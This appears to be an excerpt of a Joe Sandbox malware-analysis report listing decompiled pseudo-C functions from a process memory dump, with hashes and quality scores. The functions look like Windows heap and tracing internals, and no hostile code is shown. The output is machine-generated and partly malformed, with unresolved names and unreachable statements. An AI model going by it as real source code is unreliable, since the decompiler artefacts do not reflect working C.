              • Opcode ID: a088fe30d6c40971c5f5c2c01f7f32cab147c4175cead840222769de544f0fa3
              • Instruction ID: 29dc5565093181e87fca85763012d11374fbcb38c914a54f3d82793b39672d0b
              • Opcode Fuzzy Hash: a088fe30d6c40971c5f5c2c01f7f32cab147c4175cead840222769de544f0fa3
              • Instruction Fuzzy Hash: 7D110C70A002099FDB04DFA9D445BAEB7F4FB08300F0482AAE519EB382E634A940DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E04C98A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
              				signed int _v12;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				short _v66;
              				char _v72;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed char* _t18;
              				signed int _t32;
              
              				_t29 = __edx;
              				_v12 =  *0x4cbd360 ^ _t32;
              				_t31 = _a8;
              				_t30 = _a12;
              				_v66 = 0x1c20;
              				_v40 = __ecx;
              				_v36 = __edx;
              				_v32 = _a4;
              				_v28 = _a8;
              				_v24 = _a12;
              				if(E04BE7D50() == 0) {
              					_t18 = 0x7ffe0386;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v72);
              				_push(0x14);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
              			}

















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ce24fb55f45ca5bcd4289882205f5943a1dfd32e1048aaa0eb886b3b53e838df
              • Instruction ID: befb264b7dbdb577a5d4948494c3d7c6966105ce0e641a47c5ca06fe942c03a4
              • Opcode Fuzzy Hash: ce24fb55f45ca5bcd4289882205f5943a1dfd32e1048aaa0eb886b3b53e838df
              • Instruction Fuzzy Hash: B10121B1A0021CAFDB04DFA9D9459AEB7F8EF49710F10406AF905E7341EB34AD00CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04BCDB60(signed int __ecx) {
              				intOrPtr* _t9;
              				void* _t12;
              				void* _t13;
              				intOrPtr _t14;
              
              				_t9 = __ecx;
              				_t14 = 0;
              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
              					_t13 = 0xc000000d;
              				} else {
              					_t14 = E04BCDB40();
              					if(_t14 == 0) {
              						_t13 = 0xc0000017;
              					} else {
              						_t13 = E04BCE7B0(__ecx, _t12, _t14, 0xfff);
              						if(_t13 < 0) {
              							L04BCE8B0(__ecx, _t14, 0xfff);
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
              							_t14 = 0;
              						} else {
              							_t13 = 0;
              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
              						}
              					}
              				}
              				 *_t9 = _t14;
              				return _t13;
              			}








              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction ID: c8cfabea92a81881647aa0781a8657a90a7f9343cca9639bbb5a9da65f663e2b
              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction Fuzzy Hash: C3F096373416229FE7726B5588C4F6BB6ADDFC1A64F1600BEF1099B344CE60EC0296E5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04BCB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
              				signed char* _t13;
              				intOrPtr _t22;
              				char _t23;
              
              				_t23 = __edx;
              				_t22 = __ecx;
              				if(E04BE7D50() != 0) {
              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
              				} else {
              					_t13 = 0x7ffe0384;
              				}
              				if( *_t13 != 0) {
              					_t13 =  *[fs:0x30];
              					if((_t13[0x240] & 0x00000004) == 0) {
              						goto L3;
              					}
              					if(E04BE7D50() == 0) {
              						_t13 = 0x7ffe0385;
              					} else {
              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
              					}
              					if(( *_t13 & 0x00000020) == 0) {
              						goto L3;
              					}
              					return E04C47016(0x14a4, _t22, _t23, _a4, _a8, 0);
              				} else {
              					L3:
              					return _t13;
              				}
              			}







              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction ID: 87a7c4a7d530ddf46e3910e40074d706f1dbd315ad575f1d751facbf122c2453
              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction Fuzzy Hash: A0012632204580EBD7268B59E944F697F99EF81354F0840B1F9008B2B1EBB4F800D218
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E04C5FE87(intOrPtr __ecx) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				signed int _v24;
              				intOrPtr _v28;
              				short _v54;
              				char _v60;
              				signed char* _t21;
              				intOrPtr _t27;
              				intOrPtr _t32;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				signed int _t35;
              
              				_v8 =  *0x4cbd360 ^ _t35;
              				_v16 = __ecx;
              				_v54 = 0x1722;
              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
              				_v28 =  *((intOrPtr*)(__ecx + 4));
              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
              				if(E04BE7D50() == 0) {
              					_t21 = 0x7ffe0382;
              				} else {
              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
              				}
              				_push( &_v60);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t21 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad6cc5a6ef547dc066c29398bc96c8b009b0d0f9a40ca4913c90b2c4253048cb
              • Instruction ID: 591083141c25b81f56ec0ebd29bfb7440e4ca53fbdf77a1b87f3deedf85c0ff9
              • Opcode Fuzzy Hash: ad6cc5a6ef547dc066c29398bc96c8b009b0d0f9a40ca4913c90b2c4253048cb
              • Instruction Fuzzy Hash: 0F016270A0020CEFCB14DFA8D542A6EB7F4EF04304F1441A9B905DB392EA75EA01DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E04C98F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				short _v50;
              				char _v56;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_v8 =  *0x4cbd360 ^ _t32;
              				_v16 = __ecx;
              				_v50 = 0x1c2c;
              				_v24 = _a4;
              				_v20 = _a8;
              				_v12 = __edx;
              				if(E04BE7D50() == 0) {
              					_t18 = 0x7ffe0386;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v56);
              				_push(0x10);
              				_push(0x402);
              				_push( *_t18 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7ac1e9a7cefac088317f6f85ac4da9b810ac6507374960b0bf0b1dbf8385b9ce
              • Instruction ID: 316bfd83347eeef43374cd93070bba46fee721e89d5db2bd693fe90908a44ffb
              • Opcode Fuzzy Hash: 7ac1e9a7cefac088317f6f85ac4da9b810ac6507374960b0bf0b1dbf8385b9ce
              • Instruction Fuzzy Hash: E3014474A0020CAFDB04EFA9D545AAEB7F5EF48700F108069B905EB381EB74EE00DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E04C8131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				short _v50;
              				char _v56;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_v8 =  *0x4cbd360 ^ _t32;
              				_v20 = _a4;
              				_v12 = _a8;
              				_v24 = __ecx;
              				_v16 = __edx;
              				_v50 = 0x1021;
              				if(E04BE7D50() == 0) {
              					_t18 = 0x7ffe0380;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              				}
              				_push( &_v56);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fadaa4bdc61b632f3a63bc51ec82625512bc0b230d8ed6c4860b3abea991dd40
              • Instruction ID: f0cb928bfb51c2f18f56d513b86c429a602adbfd9898477a454bdd38ff96feb8
              • Opcode Fuzzy Hash: fadaa4bdc61b632f3a63bc51ec82625512bc0b230d8ed6c4860b3abea991dd40
              • Instruction Fuzzy Hash: 03013171A0120CAFDB04EFA9D545AAEB7F5FF48704F048069B945EB381EA74EE00DB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04BEC577(void* __ecx, char _a4) {
              				void* __esi;
              				void* __ebp;
              				void* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              
              				_t18 = __ecx;
              				_t21 = __ecx;
              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04BEC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4ba11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					__eflags = _a4;
              					if(__eflags != 0) {
              						L10:
              						E04C988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
              						L9:
              						return 0;
              					}
              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
              					if(__eflags == 0) {
              						goto L10;
              					}
              					goto L9;
              				} else {
              					return 1;
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a0187ffdaefc4fb147770d8e9a783aaba7508fea8fc7e620bd9cbad8506530e
              • Instruction ID: 3a81addab07da469c7430c5f28006384ab6bdf4e4e777e73f393bc38c30e70d9
              • Opcode Fuzzy Hash: 0a0187ffdaefc4fb147770d8e9a783aaba7508fea8fc7e620bd9cbad8506530e
              • Instruction Fuzzy Hash: F6F09AB2A156909EE7329B2A800AB327FF8DB85774F5484E6D41687202C7A8F880C351
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E04C82073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
              				void* __esi;
              				signed char _t3;
              				signed char _t7;
              				void* _t19;
              
              				_t17 = __ecx;
              				_t3 = E04C7FD22(__ecx);
              				_t19 =  *0x4cb849c - _t3; // 0x0
              				if(_t19 == 0) {
              					__eflags = _t17 -  *0x4cb8748; // 0x0
              					if(__eflags <= 0) {
              						E04C81C06();
              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
              						__eflags = _t3;
              						if(_t3 != 0) {
              							L5:
              							__eflags =  *0x4cb8724 & 0x00000004;
              							if(( *0x4cb8724 & 0x00000004) == 0) {
              								asm("int3");
              								return _t3;
              							}
              						} else {
              							_t3 =  *0x7ffe02d4 & 0x00000003;
              							__eflags = _t3 - 3;
              							if(_t3 == 3) {
              								goto L5;
              							}
              						}
              					}
              					return _t3;
              				} else {
              					_t7 =  *0x4cb8724; // 0x0
              					return E04C78DF1(__ebx, 0xc0000374, 0x4cb5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9914cdcdbaedaf8aace028c047650a61fd1b7a77b0b4db97dba714cb7ea59fba
              • Instruction ID: 891f06e06ddb6de26ae3d0a1c3945e2d4be09b7753e289e1147f028ca599e702
              • Opcode Fuzzy Hash: 9914cdcdbaedaf8aace028c047650a61fd1b7a77b0b4db97dba714cb7ea59fba
              • Instruction Fuzzy Hash: 0EF0A07A4151844BFF32BF2575193E23B9AD75621CF1E54CAE89027200CA39AE83DBB4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 43%
              			E04C98D34(intOrPtr __ecx, intOrPtr __edx) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				short _v42;
              				char _v48;
              				signed char* _t12;
              				intOrPtr _t18;
              				intOrPtr _t24;
              				intOrPtr _t25;
              				signed int _t26;
              
              				_t23 = __edx;
              				_v8 =  *0x4cbd360 ^ _t26;
              				_v16 = __ecx;
              				_v42 = 0x1c2b;
              				_v12 = __edx;
              				if(E04BE7D50() == 0) {
              					_t12 = 0x7ffe0386;
              				} else {
              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v48);
              				_push(8);
              				_push(0x20402);
              				_push( *_t12 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2dbfd02b2c82b21baf98035be3aabba1a61f38a859831a5f0799804972aeafad
              • Instruction ID: 17cea7b855fc7c14c97c249b56178c6684ccc2c844ecb5692d31a433aa4eec5f
              • Opcode Fuzzy Hash: 2dbfd02b2c82b21baf98035be3aabba1a61f38a859831a5f0799804972aeafad
              • Instruction Fuzzy Hash: 51F0B470E0460CAFDB04EFB9D445B6EB7B5EF04700F1480A9E905EB281EA34ED00D754
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E04C0927A(void* __ecx) {
              				signed int _t11;
              				void* _t14;
              
              				_t11 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
              				if(_t11 != 0) {
              					E04C0FA60(_t11, 0, 0x98);
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
              					E04C092C6(_t11, _t14);
              				}
              				return _t11;
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
              • Instruction ID: 4c49cfec22e8e4b4bead85ff433b48f7363d494d7ea301336d3a674e363a12e6
              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
              • Instruction Fuzzy Hash: 07E065722405406BE7219E56DC84B57765EDF82725F048079B5045E282C6F5E90987A4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 36%
              			E04C98CD6(intOrPtr __ecx) {
              				signed int _v8;
              				intOrPtr _v12;
              				short _v38;
              				char _v44;
              				signed char* _t11;
              				intOrPtr _t17;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				signed int _t25;
              
              				_v8 =  *0x4cbd360 ^ _t25;
              				_v12 = __ecx;
              				_v38 = 0x1c2d;
              				if(E04BE7D50() == 0) {
              					_t11 = 0x7ffe0386;
              				} else {
              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v44);
              				_push(0xffffffe4);
              				_push(0x402);
              				_push( *_t11 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7cc5ac6b531ae13d7899725aa4804a494a8dc4f5e179b68c2083bb968fdfd1de
              • Instruction ID: cf6e40cb6c0083910df2c4f434c3d6a843c71b160972c4044577c462ece11977
              • Opcode Fuzzy Hash: 7cc5ac6b531ae13d7899725aa4804a494a8dc4f5e179b68c2083bb968fdfd1de
              • Instruction Fuzzy Hash: 4EF08271A04209ABDB04EBA9E945E6E77B4EF49304F1441A9F916EB2C1EA34ED00D754
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 88%
              			E04BE746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
              				signed int _t8;
              				void* _t10;
              				short* _t17;
              				void* _t19;
              				intOrPtr _t20;
              				void* _t21;
              
              				_t20 = __esi;
              				_t19 = __edi;
              				_t17 = __ebx;
              				if( *((char*)(_t21 - 0x25)) != 0) {
              					if(__ecx == 0) {
              						E04BDEB70(__ecx, 0x4cb79a0);
              					} else {
              						asm("lock xadd [ecx], eax");
              						if((_t8 | 0xffffffff) == 0) {
              							_push( *((intOrPtr*)(__ecx + 4)));
              							E04C095D0();
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
              						}
              					}
              					L10:
              				}
              				_t10 = _t19 + _t19;
              				if(_t20 >= _t10) {
              					if(_t19 != 0) {
              						 *_t17 = 0;
              						return 0;
              					}
              				}
              				return _t10;
              				goto L10;
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: efd2088a359f63f2582127c4250dfee39a930e17bbe428808da77e277d397b54
              • Instruction ID: 8c10aaa280337608a7dfd079c581f78e319a2ec78a217280f30912caa17d1ede
              • Opcode Fuzzy Hash: efd2088a359f63f2582127c4250dfee39a930e17bbe428808da77e277d397b54
              • Instruction Fuzzy Hash: F3F0E934A01158AADF11EB6EC540F797FB2AF84314F0403D5E891AB160FF65F800D785
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 36%
              			E04C98B58(intOrPtr __ecx) {
              				signed int _v8;
              				intOrPtr _v20;
              				short _v46;
              				char _v52;
              				signed char* _t11;
              				intOrPtr _t17;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				signed int _t25;
              
              				_v8 =  *0x4cbd360 ^ _t25;
              				_v20 = __ecx;
              				_v46 = 0x1c26;
              				if(E04BE7D50() == 0) {
              					_t11 = 0x7ffe0386;
              				} else {
              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v52);
              				_push(4);
              				_push(0x402);
              				_push( *_t11 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5119f9e520efa3849c34c87730adf99ff73d03851ef3f1a2febf06a268674d88
              • Instruction ID: ba546419df9ebacc7c73e3ef2215bd18f210c696e62e7c57e575124cc21fc25a
              • Opcode Fuzzy Hash: 5119f9e520efa3849c34c87730adf99ff73d03851ef3f1a2febf06a268674d88
              • Instruction Fuzzy Hash: C2F082B0A14258ABEB04EBA9D906E7EB3B5EF04304F4444A9BA05DB3C1FB74ED00D794
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04BC4F2E(void* __ecx, char _a4) {
              				void* __esi;
              				void* __ebp;
              				void* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              
              				_t18 = __ecx;
              				_t21 = __ecx;
              				if(__ecx == 0) {
              					L6:
              					__eflags = _a4;
              					if(__eflags != 0) {
              						L8:
              						E04C988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
              						L9:
              						return 0;
              					}
              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
              					if(__eflags != 0) {
              						goto L9;
              					}
              					goto L8;
              				}
              				_t18 = __ecx + 0x30;
              				if(E04BEC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4ba1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					goto L6;
              				} else {
              					return 1;
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7b8fdbe51fc1fe9df77429c103a8db9b60257458cc0e23c389a67b339436f77c
              • Instruction ID: 40802ca9912e72643cd46dff5aae48cc7e12401a65c65b59a286f434e73596da
              • Opcode Fuzzy Hash: 7b8fdbe51fc1fe9df77429c103a8db9b60257458cc0e23c389a67b339436f77c
              • Instruction Fuzzy Hash: B5F0E2325256A89FE771DB2AC284B22B7E7FB017B8F0444A6D50587920C7B4FE40C690
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E04BCF358(void* __ecx, signed int __edx) {
              				char _v8;
              				signed int _t9;
              				void* _t20;
              
              				_push(__ecx);
              				_t9 = 2;
              				_t20 = 0;
              				if(E04BFF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
              					_t20 = L04BE4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
              				}
              				return _t20;
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
              • Instruction ID: a4133e145225915708660912cf04fb8224e76b55bc8a429bdc96729d9ad1be7a
              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
              • Instruction Fuzzy Hash: 3CE0D832A40118FFDB3196D99D05FBABBADDB84B60F0001D6B904DB190D570AD00C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04BDFF60(intOrPtr _a4) {
              				void* __ecx;
              				void* __ebp;
              				void* _t13;
              				intOrPtr _t14;
              				void* _t15;
              				void* _t16;
              				void* _t17;
              
              				_t14 = _a4;
              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4ba11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					return E04C988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
              				} else {
              					return E04BE0050(_t14);
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
